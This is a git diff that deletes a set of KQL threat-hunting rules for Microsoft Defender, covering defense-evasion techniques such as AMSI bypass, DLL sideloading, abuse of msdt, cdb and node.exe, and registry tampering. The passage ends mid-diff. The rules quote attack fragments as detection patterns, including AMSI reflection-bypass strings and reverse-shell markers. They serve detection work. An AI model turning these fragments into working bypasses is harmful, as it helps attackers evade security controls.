--- a/Defense Evasion/Potential_AMSI_Bypass_Using_NULL_Bits.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/01/04
-// Level: medium
-// Description: Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
-| where ProcessCommandLine contains "if(0){{{0}}}' -f $(0 -as [char]) +" or ProcessCommandLine contains "#<NULL>"
\ No newline at end of file
diff --git a/Defense Evasion/Potential_AMSI_Bypass_Via_.NET_Reflection.kql b/Defense Evasion/Potential_AMSI_Bypass_Via_.NET_Reflection.kql
deleted file mode 100644
index 59588cc9..00000000
--- a/Defense Evasion/Potential_AMSI_Bypass_Via_.NET_Reflection.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Markus Neis, @Kostastsale
-// Date: 2018/08/17
-// Level: high
-// Description: Detects Request to "amsiInitFailed" that can be used to disable AMSI Scanning
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "System.Management.Automation.AmsiUtils" or ProcessCommandLine contains "amsiInitFailed") or (ProcessCommandLine contains "[Ref].Assembly.GetType" and ProcessCommandLine contains "SetValue($null,$true)" and ProcessCommandLine contains "NonPublic,Static")
\ No newline at end of file
diff --git a/Defense Evasion/Potential_AMSI_COM_Server_Hijacking.kql b/Defense Evasion/Potential_AMSI_COM_Server_Hijacking.kql
deleted file mode 100644
index 8dc88184..00000000
--- a/Defense Evasion/Potential_AMSI_COM_Server_Hijacking.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/01/04
-// Level: high
-// Description: Detects changes to the AMSI come server registry key in order disable AMSI scanning functionalities. When AMSI attempts to starts its COM component, it will query its registered CLSID and return a non-existent COM server. This causes a load failure and prevents any scanning methods from being accessed, ultimately rendering AMSI useless
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceRegistryEvents
-| where RegistryKey endswith "\\CLSID\\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\\InProcServer32\\(Default)" and (not(RegistryValueData =~ "%windir%\\system32\\amsi.dll"))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_AVKkid.DLL_Sideloading.kql b/Defense Evasion/Potential_AVKkid.DLL_Sideloading.kql
deleted file mode 100644
index e192e978..00000000
--- a/Defense Evasion/Potential_AVKkid.DLL_Sideloading.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/08/03
-// Level: medium
-// Description: Detects potential DLL sideloading of "AVKkid.dll"
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\AVKkid.dll" and (not(((FolderPath startswith "C:\\Program Files (x86)\\G DATA\\" or FolderPath startswith "C:\\Program Files\\G DATA\\") and (InitiatingProcessFolderPath contains "C:\\Program Files (x86)\\G DATA\\" or InitiatingProcessFolderPath contains "C:\\Program Files\\G DATA\\") and InitiatingProcessFolderPath endswith "\\AVKKid.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Adplus.EXE_Abuse.kql b/Defense Evasion/Potential_Adplus.EXE_Abuse.kql
deleted file mode 100644
index 680e85fa..00000000
--- a/Defense Evasion/Potential_Adplus.EXE_Abuse.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/09
-// Level: high
-// Description: Detects execution of "AdPlus.exe", a binary that is part of the Windows SDK that can be used as a LOLBIN in order to dump process memory and execute arbitrary commands.
-// Tags: attack.defense_evasion, attack.execution, attack.t1003.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -hang " or ProcessCommandLine contains " -pn " or ProcessCommandLine contains " -pmn " or ProcessCommandLine contains " -p " or ProcessCommandLine contains " -po " or ProcessCommandLine contains " -c " or ProcessCommandLine contains " -sc ") and (FolderPath endswith "\\adplus.exe" or ProcessVersionInfoOriginalFileName =~ "Adplus.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Antivirus_Software_DLL_Sideloading.kql b/Defense Evasion/Potential_Antivirus_Software_DLL_Sideloading.kql
deleted file mode 100644
index 000b03f0..00000000
--- a/Defense Evasion/Potential_Antivirus_Software_DLL_Sideloading.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
-// Date: 2022/08/17
-// Level: medium
-// Description: Detects potential DLL sideloading of DLLs that are part of antivirus software suchas McAfee, Symantec...etc
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\log.dll" and (not(((FolderPath startswith "C:\\Program Files\\Bitdefender Antivirus Free\\" or FolderPath startswith "C:\\Program Files (x86)\\Bitdefender Antivirus Free\\") or FolderPath startswith "C:\\Program Files\\Canon\\MyPrinter\\" or (InitiatingProcessFolderPath =~ "C:\\Program Files\\Dell\\SARemediation\\audit\\TelemetryUtility.exe" and (FolderPath in~ ("C:\\Program Files\\Dell\\SARemediation\\plugin\\log.dll", "C:\\Program Files\\Dell\\SARemediation\\audit\\log.dll"))))))) or (FolderPath endswith "\\qrt.dll" and (not((FolderPath startswith "C:\\Program Files\\F-Secure\\Anti-Virus\\" or FolderPath startswith "C:\\Program Files (x86)\\F-Secure\\Anti-Virus\\")))) or ((FolderPath endswith "\\ashldres.dll" or FolderPath endswith "\\lockdown.dll" or FolderPath endswith "\\vsodscpl.dll") and (not((FolderPath startswith "C:\\Program Files\\McAfee\\" or FolderPath startswith "C:\\Program Files (x86)\\McAfee\\")))) or (FolderPath endswith "\\vftrace.dll" and (not((FolderPath startswith "C:\\Program Files\\CyberArk\\Endpoint Privilege Manager\\Agent\\x32\\" or FolderPath startswith "C:\\Program Files (x86)\\CyberArk\\Endpoint Privilege Manager\\Agent\\x32\\")))) or (FolderPath endswith "\\wsc.dll" and (not((FolderPath startswith "C:\\program Files\\AVAST Software\\Avast\\" or FolderPath startswith "C:\\program Files (x86)\\AVAST Software\\Avast\\")))) or (FolderPath endswith "\\tmdbglog.dll" and (not((FolderPath startswith "C:\\program Files\\Trend Micro\\Titanium\\" or FolderPath startswith "C:\\program Files (x86)\\Trend Micro\\Titanium\\")))) or (FolderPath endswith "\\DLPPREM32.dll" and (not((FolderPath startswith "C:\\program Files\\ESET" or FolderPath startswith "C:\\program Files (x86)\\ESET"))))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Application_Whitelisting_Bypass_via_Dnx.EXE.kql b/Defense Evasion/Potential_Application_Whitelisting_Bypass_via_Dnx.EXE.kql
deleted file mode 100644
index 9fb59ef2..00000000
--- a/Defense Evasion/Potential_Application_Whitelisting_Bypass_via_Dnx.EXE.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Beyu Denis, oscd.community
-// Date: 2019/10/26
-// Level: medium
-// Description: Detects the execution of Dnx.EXE. The Dnx utility allows for the execution of C# code.
-Attackers might abuse this in order to bypass application whitelisting.
-
-// Tags: attack.defense_evasion, attack.t1218, attack.t1027.004
-DeviceProcessEvents
-| where FolderPath endswith "\\dnx.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Arbitrary_Code_Execution_Via_Node.EXE.kql b/Defense Evasion/Potential_Arbitrary_Code_Execution_Via_Node.EXE.kql
deleted file mode 100644
index 3a7f1b22..00000000
--- a/Defense Evasion/Potential_Arbitrary_Code_Execution_Via_Node.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/09/09
-// Level: high
-// Description: Detects the execution node.exe which is shipped with multiple software such as VMware, Adobe...etc. In order to execute arbitrary code. For example to establish reverse shell as seen in Log4j attacks...etc
-// Tags: attack.defense_evasion, attack.t1127
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " -e " or ProcessCommandLine contains " --eval ") and FolderPath endswith "\\node.exe") and (ProcessCommandLine contains ".exec(" and ProcessCommandLine contains "net.socket" and ProcessCommandLine contains ".connect" and ProcessCommandLine contains "child_process")
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Arbitrary_Command_Execution_Using_Msdt.EXE.kql b/Defense Evasion/Potential_Arbitrary_Command_Execution_Using_Msdt.EXE.kql
deleted file mode 100644
index 8bb69102..00000000
--- a/Defense Evasion/Potential_Arbitrary_Command_Execution_Using_Msdt.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/05/29
-// Level: high
-// Description: Detects processes leveraging the "ms-msdt" handler or the "msdt.exe" binary to execute arbitrary commands as seen in the follina (CVE-2022-30190) vulnerability
-// Tags: attack.defense_evasion, attack.t1202
-DeviceProcessEvents
-| where (FolderPath endswith "\\msdt.exe" or ProcessVersionInfoOriginalFileName =~ "msdt.exe") and (ProcessCommandLine contains "IT_BrowseForFile=" or (ProcessCommandLine contains " PCWDiagnostic" and (ProcessCommandLine contains " -af " or ProcessCommandLine contains " /af ")))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Arbitrary_Command_Execution_Via_FTP.EXE.kql b/Defense Evasion/Potential_Arbitrary_Command_Execution_Via_FTP.EXE.kql
deleted file mode 100644
index 4d1541c8..00000000
--- a/Defense Evasion/Potential_Arbitrary_Command_Execution_Via_FTP.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Victor Sergeev, oscd.community
-// Date: 2020/10/09
-// Level: medium
-// Description: Detects execution of "ftp.exe" script with the "-s" or "/s" flag and any child processes ran by "ftp.exe".
-// Tags: attack.execution, attack.t1059, attack.defense_evasion, attack.t1202
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\ftp.exe" or ((ProcessCommandLine contains "-s:" or ProcessCommandLine contains "/s:") and (FolderPath endswith "\\ftp.exe" or ProcessVersionInfoOriginalFileName =~ "ftp.exe"))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Arbitrary_DLL_Load_Using_Winword.kql b/Defense Evasion/Potential_Arbitrary_DLL_Load_Using_Winword.kql
deleted file mode 100644
index 634eadc3..00000000
--- a/Defense Evasion/Potential_Arbitrary_DLL_Load_Using_Winword.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Victor Sergeev, oscd.community
-// Date: 2020/10/09
-// Level: medium
-// Description: Detects potential DLL sideloading using the Microsoft Office winword process via the '/l' flag.
-// Tags: attack.defense_evasion, attack.t1202
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/l " and ProcessCommandLine contains ".dll") and (FolderPath endswith "\\WINWORD.exe" or ProcessVersionInfoOriginalFileName =~ "WinWord.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Arbitrary_File_Download_Using_Office_Application.kql b/Defense Evasion/Potential_Arbitrary_File_Download_Using_Office_Application.kql
deleted file mode 100644
index 2fb5e04e..00000000
--- a/Defense Evasion/Potential_Arbitrary_File_Download_Using_Office_Application.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Beyu Denis, oscd.community
-// Date: 2022/05/17
-// Level: high
-// Description: Detects potential arbitrary file download using a Microsoft Office application
-// Tags: attack.defense_evasion, attack.t1202
-DeviceProcessEvents
-| where (ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and ((FolderPath endswith "\\EXCEL.EXE" or FolderPath endswith "\\POWERPNT.EXE" or FolderPath endswith "\\WINWORD.exe") or (ProcessVersionInfoOriginalFileName in~ ("Excel.exe", "POWERPNT.EXE", "WinWord.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Arbitrary_File_Download_Via_Cmdl32.EXE.kql b/Defense Evasion/Potential_Arbitrary_File_Download_Via_Cmdl32.EXE.kql
deleted file mode 100644
index 4d75232f..00000000
--- a/Defense Evasion/Potential_Arbitrary_File_Download_Via_Cmdl32.EXE.kql	
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: frack113
-// Date: 2021/11/03
-// Level: medium
-// Description: Detects execution of Cmdl32 with the "/vpn" and "/lan" flags.
-Attackers can abuse this utility in order to download arbitrary files via a configuration file.
-Inspect the location and the content of the file passed as an argument in order to determine if it is suspicious.
-
-// Tags: attack.execution, attack.defense_evasion, attack.t1218, attack.t1202
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/vpn" and ProcessCommandLine contains "/lan") and (FolderPath endswith "\\cmdl32.exe" or ProcessVersionInfoOriginalFileName =~ "CMDL32.EXE")
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Attachment_Manager_Settings_Associations_Tamper.kql b/Defense Evasion/Potential_Attachment_Manager_Settings_Associations_Tamper.kql
deleted file mode 100644
index e9726a4d..00000000
--- a/Defense Evasion/Potential_Attachment_Manager_Settings_Associations_Tamper.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/01
-// Level: high
-// Description: Detects tampering with attachment manager settings policies associations to lower the default file type risks (See reference for more information)
-// Tags: attack.defense_evasion
-DeviceRegistryEvents
-| where RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Associations" and ((RegistryValueData =~ "DWORD (0x00006152)" and RegistryKey endswith "\\DefaultFileTypeRisk") or ((RegistryValueData contains ".zip;" or RegistryValueData contains ".rar;" or RegistryValueData contains ".exe;" or RegistryValueData contains ".bat;" or RegistryValueData contains ".com;" or RegistryValueData contains ".cmd;" or RegistryValueData contains ".reg;" or RegistryValueData contains ".msi;" or RegistryValueData contains ".htm;" or RegistryValueData contains ".html;") and RegistryKey endswith "\\LowRiskFileTypes"))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Attachment_Manager_Settings_Attachments_Tamper.kql b/Defense Evasion/Potential_Attachment_Manager_Settings_Attachments_Tamper.kql
deleted file mode 100644
index 9a5ab3b6..00000000
--- a/Defense Evasion/Potential_Attachment_Manager_Settings_Attachments_Tamper.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/01
-// Level: high
-// Description: Detects tampering with attachment manager settings policies attachments (See reference for more information)
-// Tags: attack.defense_evasion
-DeviceRegistryEvents
-| where RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Attachments" and ((RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\HideZoneInfoOnProperties") or (RegistryValueData =~ "DWORD (0x00000002)" and RegistryKey endswith "\\SaveZoneInformation") or (RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\ScanWithAntiVirus"))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_AutoLogger_Sessions_Tampering.kql b/Defense Evasion/Potential_AutoLogger_Sessions_Tampering.kql
deleted file mode 100644
index e86a83a1..00000000
--- a/Defense Evasion/Potential_AutoLogger_Sessions_Tampering.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/01
-// Level: high
-// Description: Detects tampering with autologger trace sessions which is a technique used by attackers to disable logging
-// Tags: attack.defense_evasion
-DeviceRegistryEvents
-| where (RegistryKey contains "\\System\\CurrentControlSet\\Control\\WMI\\Autologger" and (RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey contains "\\EventLog-" or RegistryKey contains "\\Defender") and (RegistryKey endswith "\\Enable" or RegistryKey endswith "\\Start"))) and (not(InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\wevtutil.exe"))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Azure_Browser_SSO_Abuse.kql b/Defense Evasion/Potential_Azure_Browser_SSO_Abuse.kql
deleted file mode 100644
index 49da9307..00000000
--- a/Defense Evasion/Potential_Azure_Browser_SSO_Abuse.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Den Iuzvyk
-// Date: 2020/07/15
-// Level: low
-// Description: Detects abusing Azure Browser SSO by requesting OAuth 2.0 refresh tokens for an Azure-AD-authenticated Windows user (i.e. the machine is joined to Azure AD and a user logs in with their Azure AD account) wanting to perform SSO authentication in the browser.
-An attacker can use this to authenticate to Azure AD in a browser as that user.
-
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath =~ "C:\\Windows\\System32\\MicrosoftAccountTokenProvider.dll" and (not((InitiatingProcessFolderPath endswith "\\BackgroundTaskHost.exe" and (InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\")))) and (not(((InitiatingProcessFolderPath endswith "\\IDE\\devenv.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft Visual Studio\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft Visual Studio\\")) or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\" or InitiatingProcessFolderPath endswith "\\WindowsApps\\MicrosoftEdge.exe" or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", "C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe"))) or ((InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\msedgewebview2.exe") and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeCore\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft\\EdgeCore\\")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "C:\\Program Files\\Internet Explorer\\iexplore.exe")) or isnull(InitiatingProcessFolderPath) or InitiatingProcessFolderPath endswith "\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Binary_Impersonating_Sysinternals_Tools.kql b/Defense Evasion/Potential_Binary_Impersonating_Sysinternals_Tools.kql
deleted file mode 100644
index e33493d3..00000000
--- a/Defense Evasion/Potential_Binary_Impersonating_Sysinternals_Tools.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/12/20
-// Level: medium
-// Description: Detects binaries that use the same name as legitimate sysinternals tools to evade detection
-// Tags: attack.execution, attack.defense_evasion, attack.t1218, attack.t1202
-DeviceProcessEvents
-| where (FolderPath endswith "\\accesschk.exe" or FolderPath endswith "\\accesschk64.exe" or FolderPath endswith "\\AccessEnum.exe" or FolderPath endswith "\\ADExplorer.exe" or FolderPath endswith "\\ADExplorer64.exe" or FolderPath endswith "\\ADInsight.exe" or FolderPath endswith "\\ADInsight64.exe" or FolderPath endswith "\\adrestore.exe" or FolderPath endswith "\\adrestore64.exe" or FolderPath endswith "\\Autologon.exe" or FolderPath endswith "\\Autologon64.exe" or FolderPath endswith "\\Autoruns.exe" or FolderPath endswith "\\Autoruns64.exe" or FolderPath endswith "\\autorunsc.exe" or FolderPath endswith "\\autorunsc64.exe" or FolderPath endswith "\\Bginfo.exe" or FolderPath endswith "\\Bginfo64.exe" or FolderPath endswith "\\Cacheset.exe" or FolderPath endswith "\\Cacheset64.exe" or FolderPath endswith "\\Clockres.exe" or FolderPath endswith "\\Clockres64.exe" or FolderPath endswith "\\Contig.exe" or FolderPath endswith "\\Contig64.exe" or FolderPath endswith "\\Coreinfo.exe" or FolderPath endswith "\\Coreinfo64.exe" or FolderPath endswith "\\CPUSTRES.EXE" or FolderPath endswith "\\CPUSTRES64.EXE" or FolderPath endswith "\\ctrl2cap.exe" or FolderPath endswith "\\Dbgview.exe" or FolderPath endswith "\\dbgview64.exe" or FolderPath endswith "\\Desktops.exe" or FolderPath endswith "\\Desktops64.exe" or FolderPath endswith "\\disk2vhd.exe" or FolderPath endswith "\\disk2vhd64.exe" or FolderPath endswith "\\diskext.exe" or FolderPath endswith "\\diskext64.exe" or FolderPath endswith "\\Diskmon.exe" or FolderPath endswith "\\Diskmon64.exe" or FolderPath endswith "\\DiskView.exe" or FolderPath endswith "\\DiskView64.exe" or FolderPath endswith "\\du.exe" or FolderPath endswith "\\du64.exe" or FolderPath endswith "\\efsdump.exe" or FolderPath endswith "\\FindLinks.exe" or FolderPath endswith "\\FindLinks64.exe" or FolderPath endswith "\\handle.exe" or FolderPath endswith "\\handle64.exe" or FolderPath endswith "\\hex2dec.exe" or FolderPath endswith "\\hex2dec64.exe" or FolderPath endswith "\\junction.exe" or FolderPath endswith "\\junction64.exe" or FolderPath endswith "\\ldmdump.exe" or FolderPath endswith "\\listdlls.exe" or FolderPath endswith "\\listdlls64.exe" or FolderPath endswith "\\livekd.exe" or FolderPath endswith "\\livekd64.exe" or FolderPath endswith "\\loadOrd.exe" or FolderPath endswith "\\loadOrd64.exe" or FolderPath endswith "\\loadOrdC.exe" or FolderPath endswith "\\loadOrdC64.exe" or FolderPath endswith "\\logonsessions.exe" or FolderPath endswith "\\logonsessions64.exe" or FolderPath endswith "\\movefile.exe" or FolderPath endswith "\\movefile64.exe" or FolderPath endswith "\\notmyfault.exe" or FolderPath endswith "\\notmyfault64.exe" or FolderPath endswith "\\notmyfaultc.exe" or FolderPath endswith "\\notmyfaultc64.exe" or FolderPath endswith "\\ntfsinfo.exe" or FolderPath endswith "\\ntfsinfo64.exe" or FolderPath endswith "\\pendmoves.exe" or FolderPath endswith "\\pendmoves64.exe" or FolderPath endswith "\\pipelist.exe" or FolderPath endswith "\\pipelist64.exe" or FolderPath endswith "\\portmon.exe" or FolderPath endswith "\\procdump.exe" or FolderPath endswith "\\procdump64.exe" or FolderPath endswith "\\procexp.exe" or FolderPath endswith "\\procexp64.exe" or FolderPath endswith "\\Procmon.exe" or FolderPath endswith "\\Procmon64.exe" or FolderPath endswith "\\psExec.exe" or FolderPath endswith "\\psExec64.exe" or FolderPath endswith "\\psfile.exe" or FolderPath endswith "\\psfile64.exe" or FolderPath endswith "\\psGetsid.exe" or FolderPath endswith "\\psGetsid64.exe" or FolderPath endswith "\\psInfo.exe" or FolderPath endswith "\\psInfo64.exe" or FolderPath endswith "\\pskill.exe" or FolderPath endswith "\\pskill64.exe" or FolderPath endswith "\\pslist.exe" or FolderPath endswith "\\pslist64.exe" or FolderPath endswith "\\psLoggedon.exe" or FolderPath endswith "\\psLoggedon64.exe" or FolderPath endswith "\\psloglist.exe" or FolderPath endswith "\\psloglist64.exe" or FolderPath endswith "\\pspasswd.exe" or FolderPath endswith "\\pspasswd64.exe" or FolderPath endswith "\\psping.exe" or FolderPath endswith "\\psping64.exe" or FolderPath endswith "\\psService.exe" or FolderPath endswith "\\psService64.exe" or FolderPath endswith "\\psshutdown.exe" or FolderPath endswith "\\psshutdown64.exe" or FolderPath endswith "\\pssuspend.exe" or FolderPath endswith "\\pssuspend64.exe" or FolderPath endswith "\\RAMMap.exe" or FolderPath endswith "\\RDCMan.exe" or FolderPath endswith "\\RegDelNull.exe" or FolderPath endswith "\\RegDelNull64.exe" or FolderPath endswith "\\regjump.exe" or FolderPath endswith "\\ru.exe" or FolderPath endswith "\\ru64.exe" or FolderPath endswith "\\sdelete.exe" or FolderPath endswith "\\sdelete64.exe" or FolderPath endswith "\\ShareEnum.exe" or FolderPath endswith "\\ShareEnum64.exe" or FolderPath endswith "\\shellRunas.exe" or FolderPath endswith "\\sigcheck.exe" or FolderPath endswith "\\sigcheck64.exe" or FolderPath endswith "\\streams.exe" or FolderPath endswith "\\streams64.exe" or FolderPath endswith "\\strings.exe" or FolderPath endswith "\\strings64.exe" or FolderPath endswith "\\sync.exe" or FolderPath endswith "\\sync64.exe" or FolderPath endswith "\\Sysmon.exe" or FolderPath endswith "\\Sysmon64.exe" or FolderPath endswith "\\tcpvcon.exe" or FolderPath endswith "\\tcpvcon64.exe" or FolderPath endswith "\\tcpview.exe" or FolderPath endswith "\\tcpview64.exe" or FolderPath endswith "\\Testlimit.exe" or FolderPath endswith "\\Testlimit64.exe" or FolderPath endswith "\\vmmap.exe" or FolderPath endswith "\\vmmap64.exe" or FolderPath endswith "\\Volumeid.exe" or FolderPath endswith "\\Volumeid64.exe" or FolderPath endswith "\\whois.exe" or FolderPath endswith "\\whois64.exe" or FolderPath endswith "\\Winobj.exe" or FolderPath endswith "\\Winobj64.exe" or FolderPath endswith "\\ZoomIt.exe" or FolderPath endswith "\\ZoomIt64.exe") and (not((isnull(ProcessVersionInfoCompanyName) or (ProcessVersionInfoCompanyName in~ ("Sysinternals - www.sysinternals.com", "Sysinternals")))))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Binary_Proxy_Execution_Via_Cdb.EXE.kql b/Defense Evasion/Potential_Binary_Proxy_Execution_Via_Cdb.EXE.kql
deleted file mode 100644
index 17de2322..00000000
--- a/Defense Evasion/Potential_Binary_Proxy_Execution_Via_Cdb.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Beyu Denis, oscd.community, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2019/10/26
-// Level: medium
-// Description: Detects usage of "cdb.exe" to launch arbitrary processes or commands from a debugger script file
-// Tags: attack.execution, attack.t1106, attack.defense_evasion, attack.t1218, attack.t1127
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -c " or ProcessCommandLine contains " -cf ") and (FolderPath endswith "\\cdb.exe" or ProcessVersionInfoOriginalFileName =~ "CDB.Exe")
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Binary_Proxy_Execution_Via_VSDiagnostics.EXE.kql b/Defense Evasion/Potential_Binary_Proxy_Execution_Via_VSDiagnostics.EXE.kql
deleted file mode 100644
index 0a63b246..00000000
--- a/Defense Evasion/Potential_Binary_Proxy_Execution_Via_VSDiagnostics.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/08/03
-// Level: medium
-// Description: Detects execution of "VSDiagnostics.exe" with the "start" command in order to launch and proxy arbitrary binaries.
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains " /launch:" or ProcessCommandLine contains " -launch:") and ProcessCommandLine contains "start" and (FolderPath endswith "\\VSDiagnostics.exe" or ProcessVersionInfoOriginalFileName =~ "VSDiagnostics.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Potential_CCleanerDU.DLL_Sideloading.kql b/Defense Evasion/Potential_CCleanerDU.DLL_Sideloading.kql
deleted file mode 100644
index 1c5d0f3d..00000000
--- a/Defense Evasion/Potential_CCleanerDU.DLL_Sideloading.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/07/13
-// Level: medium
-// Description: Detects potential DLL sideloading of "CCleanerDU.dll"
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\CCleanerDU.dll" and (not(((InitiatingProcessFolderPath endswith "\\CCleaner.exe" or InitiatingProcessFolderPath endswith "\\CCleaner64.exe") and (InitiatingProcessFolderPath startswith "C:\\Program Files\\CCleaner\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\CCleaner\\"))))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_CCleanerReactivator.DLL_Sideloading.kql b/Defense Evasion/Potential_CCleanerReactivator.DLL_Sideloading.kql
deleted file mode 100644
index 7d335d90..00000000
--- a/Defense Evasion/Potential_CCleanerReactivator.DLL_Sideloading.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior
-// Date: 2023/07/13
-// Level: medium
-// Description: Detects potential DLL sideloading of "CCleanerReactivator.dll"
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\CCleanerReactivator.dll" and (not((InitiatingProcessFolderPath endswith "\\CCleanerReactivator.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\CCleaner\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\CCleaner\\"))))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Chrome_Frame_Helper_DLL_Sideloading.kql b/Defense Evasion/Potential_Chrome_Frame_Helper_DLL_Sideloading.kql
deleted file mode 100644
index 4ca5d408..00000000
--- a/Defense Evasion/Potential_Chrome_Frame_Helper_DLL_Sideloading.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
-// Date: 2022/08/17
-// Level: medium
-// Description: Detects potential DLL sideloading of "chrome_frame_helper.dll"
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\chrome_frame_helper.dll" and (not((FolderPath startswith "C:\\Program Files\\Google\\Chrome\\Application\\" or FolderPath startswith "C:\\Program Files (x86)\\Google\\Chrome\\Application\\"))) and (not(FolderPath contains "\\AppData\\local\\Google\\Chrome\\Application\\"))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Command_Line_Path_Traversal_Evasion_Attempt.kql b/Defense Evasion/Potential_Command_Line_Path_Traversal_Evasion_Attempt.kql
deleted file mode 100644
index 69960a71..00000000
--- a/Defense Evasion/Potential_Command_Line_Path_Traversal_Evasion_Attempt.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
